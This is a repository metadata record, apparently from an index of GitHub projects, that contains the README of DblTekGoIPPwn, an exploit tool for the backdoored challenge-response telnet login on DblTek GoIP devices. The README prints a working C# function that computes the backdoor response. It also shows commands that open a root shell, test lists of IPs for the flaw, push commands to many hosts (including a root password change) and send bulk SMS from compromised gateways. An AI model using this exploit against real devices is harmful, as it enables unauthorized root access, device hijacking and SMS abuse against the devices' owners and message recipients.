{"id":13463939,"url":"https://github.com/JacobMisirian/DblTekGoIPPwn","last_synced_at":"2025-03-25T09:31:17.572Z","repository":{"id":96585306,"uuid":"83937423","full_name":"JacobMisirian/DblTekGoIPPwn","owner":"JacobMisirian","description":"Tool to check if an IP of a DblTek GoIP is vulnerable to a challenge-response login system, send SMS messages from the system, execute remote commands botnet style, and generate responses to challenges.","archived":false,"fork":false,"pushed_at":"2019-12-12T18:38:27.000Z","size":29,"stargazers_count":60,"open_issues_count":2,"forks_count":26,"subscribers_count":15,"default_branch":"master","last_synced_at":"2024-10-29T16:22:08.715Z","etag":null,"topics":["challenge-response","dbltek-goip","gsm","gsm-modem","hacking-tool","penetration-testing","sms","sms-gateway","telnet","voip","vulnerability"],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/JacobMisirian.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2017-03-05T01:50:56.000Z","updated_at":"2024-10-27T05:44:40.000Z","dependencies_parsed_at":"2023-03-13T16:29:17.068Z","dependency_job_id":null,"html_url":"https://github.com/JacobMisirian/DblTekGoIPPwn","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JacobMisirian%2FDblTekGoIPPwn","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JacobMisirian%2FDblTekGoIPPwn/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JacobMisirian%2FDblTekGoIPPwn/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JacobMisirian%2FDblTekGoIPPwn/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/JacobMisirian","download_url":"https://codeload.github.com/JacobMisirian/DblTekGoIPPwn/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245435136,"owners_count":20614839,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["challenge-response","dbltek-goip","gsm","gsm-modem","hacking-tool","penetration-testing","sms","sms-gateway","telnet","voip","vulnerability"],"created_at":"2024-07-31T14:00:30.939Z","updated_at":"2025-03-25T09:31:14.993Z","avatar_url":"https://github.com/JacobMisirian.png","language":"C#","funding_links":[],"categories":["C# #"],"sub_categories":[],"readme":"# DblTekGoIPPwn\n\nTool to exploit challenge response system in vulnerable DblTek GoIP devices. Can generate responses to\nspecified challenges, test hosts for the vulnerability, run commands on vulnerable hosts, send SMS messages from a host, and drop\ninto a root shell on any vulnerable host.\n\n## The Vulnerability\n\nOn March 2nd, 2017, Trustwave released a vulnerability that security researchers found in the DblTek\nGoIP VoIP Phone. The vulnerability was a backdoor in the firmware for an account named 'dbladm'. When\na user entered this as their username in a telnet prompt, the system would present a challenge that when\nfollowed with the right response, gave the user a root shell on the system.\n\nThe problem with such a challenge response system is that the devices are as secure as the algorithm for\ngenerating the responses, which was reverse engineered from firmware binaries provided by DblTek. Using this\nalgorithm, a root shell can be aquired on ANY DblTek GoIP device.\n\nOriginal Article: https://www.trustwave.com/Resources/SpiderLabs-Blog/Undocumented-Backdoor-Account-in-DBLTek-GoIP/\n\nUsing the description of the backdoor provided in the article, I was able to write what I believe to be\nsome of the first exploit code for this vulnerability. The core of this is of course the algorithm to\ngenerate the response based on a given challenge. Here is a function to do this written in C#.\n\n```C#\nstatic string ComputeResponse(string challengeStr)\n{\n int challenge = Convert.ToInt32(challengeStr.Substring(1)); // Get just the number after 'N'.\n\n string modified = (challenge + 20139 + (challenge \u003e\u003e 3)).ToString(); // Perform some dummy 1337 operations.\n\n byte[] buffer = new byte[64];\n // Copy the string into the first part of the buffer.\n for (int i = 0; i \u003c modified.Length; i++)\n buffer[i] = (byte)modified[i];\n\n var md5 = MD5.Create();\n byte[] hash = md5.ComputeHash(buffer); // Calculate the MD5 of the buffer.\n\n StringBuilder sb = new StringBuilder(); // Will hold the results.\n // Take the unpadded hex value of the first six bytes of the MD5.\n for (int i = 0; i \u003c 6; i++)\n sb.Append(hash[i].ToString(\"x\"));\n\n return sb.ToString(); // Profit\n}\n```\n\n## DblTekGoIPPwn Command Line Interface (CLI)\n\nWhen DblTekPwn is ran without arguments, the help is displayed. This is the output:\n\n```\nUSAGE: DblTekPwn.exe [MODE] [HOSTS] [OUTPUT]\n\n[MODE]:\n-c --compute-response [CHALLENGE] Computes a response to the given challenge.\n-r --root-shell Starts a root shell with the vulnerable host.\n-s --send-commands [COMMAND_FILE] Sends commands from a file to vulnerable hosts.\n-t --test Tests hosts and determines if they are vulnerable.\n-h --help Displays this help and exits.\n\n[HOSTS]:\n-n --name [IP] Specifies a single IP address.\n-f --file [IP_FILE] Specifies a file with IP\\nIP\\nIP.\n\n[OUTPUT]:\n-o --output [OUTPUT_FILE] Specifies an output file. Default stdin.\n```\n\n## Examples\n\n### Getting a Root Shell on a Vulnerable System\n\nDblTekGoIPPwn makes it easy to get a root shell on any vulnerable system. Simply run the\nfollowing command using the vulnerable IP.\n\n```\nDblTekPwn.exe --root-shell --name 192.168.1.1\n```\n\nYou will see output that looks like this:\n```\nPassword: ***********\n\n```\n\nFrom here you can begin entering commands (there is no shell prompt).\n\n### Calculating a Challenge Response\n\nSay you wanted to calculate the response to a GoIP challenge ```N1746203308```. You would just\nrun the following command.\n\n```\nDblTekPwn --compute-response N1746203308\n```\n\nThe output will be the response:\n```\nd6176d3aab2\n```\n\n### Checking a List of IPs\n\nSay you wished to check ```list.txt``` of IPs for GoIPs that are vulnerable and send this output\nto ```results.txt```. First make sure that the IPs are in format ```ip:port``` (port is default 23)\nand that the IPs are seperated by a newline ```\\n```. The following command could then be ran.\n\n```\nDblTekPwn.exe --test --file list.txt --output results.txt\n```\n\nlist.txt:\n```\n192.168.1.0\n192.168.1.1\n192.168.1.2:1337\n192.168.1.3\n192.168.1.4:2323\n```\n\nresults.txt:\n```\n192.168.1.0 False\n192.168.1.1 True\n192.168.1.2:1337 True\n192.168.1.3 False\n192.168.1.4:2323 False\n```\n\nThe ```False``` or ```True``` after the host indicates whether or not the IP is vulnerable.\n\n### Sending Commands to a List of IPs\n\nSay you had a list of commands (which is really a list of telnet inputs) in ```cmds.txt```\nto send to ```list.txt``` of IPs and send the output to ```results.txt```. First make sure\nthat the IPs are in format ```ip:port``` (port is default 23) and that BOTH the IPs AND commands\nare seperated by a newline ```\\n``` in their respective files. The following command could then\nbe ran.\n\n```\nDblTekPwn.exe --send-commands cmds.txt --file list.txt --output results.txt\n```\n\nlist.txt:\n```\n192.168.1.0\n192.168.1.1\n192.168.1.2:1337\n192.168.1.3\n192.168.1.4:2323\n```\n\ncmds.txt:\n```\npasswd root\ntoor\ntoor\n\nexit\n```\n\nresults.txt:\n```\n192.168.1.0 False\n192.168.1.1 True\n192.168.1.2:1337 True\n192.168.1.3 False\n192.168.1.4:2323 False\n```\n\nThe ```False``` or ```True``` after the host indicates whether or not the connection was successfully\nmade and the commands delivered.\n\n## Using the DblTekPwn.SMS Library\n\nThe code in this GitHub repository provides an abstraction for sending SMS (text) messages from a hacked GoIP. To use this code,\ninclude DblTekPwn.exe in your application and add the following ```using``` statement.\n\n```C#\nusing DblTekPwn.SMS\n```\n\nNow in your code you can use the static ```SmsSender.SendSms``` method. Here are a few examples.\n\n### Sending SMS From a Single Number to a Single Number\n\n```C#\nstring[] nums = new string[] { \"18005551234\" };\nstring goIP = \"192.168.1.3\";\nstring msg = \"Hello, World!\";\nSmsSender.SendSms(goIP, 23, nums, msg);\n```\n\n### Sending SMS From Multiple Numbers to a Single Number\n\nMost GoIPs have up to 32 SIM cards onboard, allowing the hacker to send SMS messages from all of these lines.\n\n```C#\nstring[] nums = new string[] { \"18005551234\" };\nstring goIP = \"192.168.1.3\";\nstring msg = \"Hai\";\nint numbers = 15;\nSmsSender.SendSms(goIP, 23, nums, msg, 1, numbers);\n```\n\n### Sending SMS From Multiple Numbers to Multiple Numbers\n\n```C#\nstrings[] nums = new string[] { \"18005551234\", \"18005554321\", \"18005551337\" };\nstring goIP = \"192.168.1.3\";\nstring msg = \"We are legion\";\nint numbers = 32;\nSmsSender.SendSms(goIP, 23, nums, msg, 1, numbers);\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FJacobMisirian%2FDblTekGoIPPwn","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FJacobMisirian%2FDblTekGoIPPwn","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FJacobMisirian%2FDblTekGoIPPwn/lists"}